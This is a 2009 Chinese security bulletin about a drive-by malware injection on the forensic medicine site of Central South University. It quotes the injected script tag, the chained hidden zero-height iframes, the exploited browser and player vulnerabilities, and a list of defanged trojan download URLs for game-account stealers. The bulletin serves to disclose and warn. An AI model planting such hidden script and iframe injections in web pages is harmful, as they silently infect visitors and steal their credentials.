挂马播报:中南大学法医网遭遇黑客挂马
来源:岁月联盟
时间:2009-03-25
该网站问题代码:
<script language="javascript" src="hxxp://css.sarl.tk/css.js?width=700&height=600&keyword=ua556"></script>
hxxp://css.sarl.tk/css.js问题框架代码:
document.write('<iframe src=hxxp://www.ryjthd.cn/33/new.htm width=100 height=0></iframe>');
hxxp://www.ryjthd.cn/33/new.htm问题框架代码:
<iframe src="au.htm" width=111 height=0 border=0></iframe>
hxxp://www.ryjthd.cn/33/au.htm问题框架代码
MS06014漏洞
MS08-041漏洞
暴风影音播放器MPS.StormPlayer漏洞
联众世界GLIEDown2.dll Active控件溢出漏洞
RealPlayer播放器IERPCtl.IERPCtl.1漏洞
Adobe Flash Player SWF文件漏洞
当用户访问hxxp://www.fmcsu.com/ 时,系统会自动下载以下病毒文件,并运行病毒文件:
hxxp://www.turthf.cn/c/kjhgjh.exehxxp://www.turthf.cn/c/DH.exehxxp://www.turthf.cn/c/setup_1027299.exehxxp://www.turthf.cn/c/1201.exehxxp://www.turthf.cn/c/shf11.exehxxp://www.turthf.cn/c/msn080.exehxxp://www.turthf.cn/y/horsecqsj.exehxxp://www.turthf.cn/y/horsems.exehxxp://www.turthf.cn/y/horsedxc.exehxxp://www.turthf.cn/y/horsemh.exehxxp://www.turthf.cn/y/horsetl.exehxxp://www.turthf.cn/y/horsejxsj.exehxxp://www.turthf.cn/y/horseqqhx.exehxxp://www.turthf.cn/y/horsewd.exehxxp://www.turthf.cn/y/horsezt.exehxxp://www.turthf.cn/y/horsecqwz.exehxxp://www.turthf.cn/y/horseqq.exehxxp://www.turthf.cn/y/horsemy.exehxxp://www.turthf.cn/y/horsexx.exehxxp://www.turthf.cn/y/horsezyhx.exehxxp://www.turthf.cn/y/horsexyqj.exehxxp://www.turthf.cn/y/horsedh2.exehxxp://www.turthf.cn/y/horseqqsg.exe
以上病毒文件多为游戏盗号类木马,自动运行后将会盗取用户敏感信息,甚至导致死机。由于下载数量太多,这里不一一分析。
关键字:黑客病毒上一篇:“钓鱼网站”差点“钓走”10余万
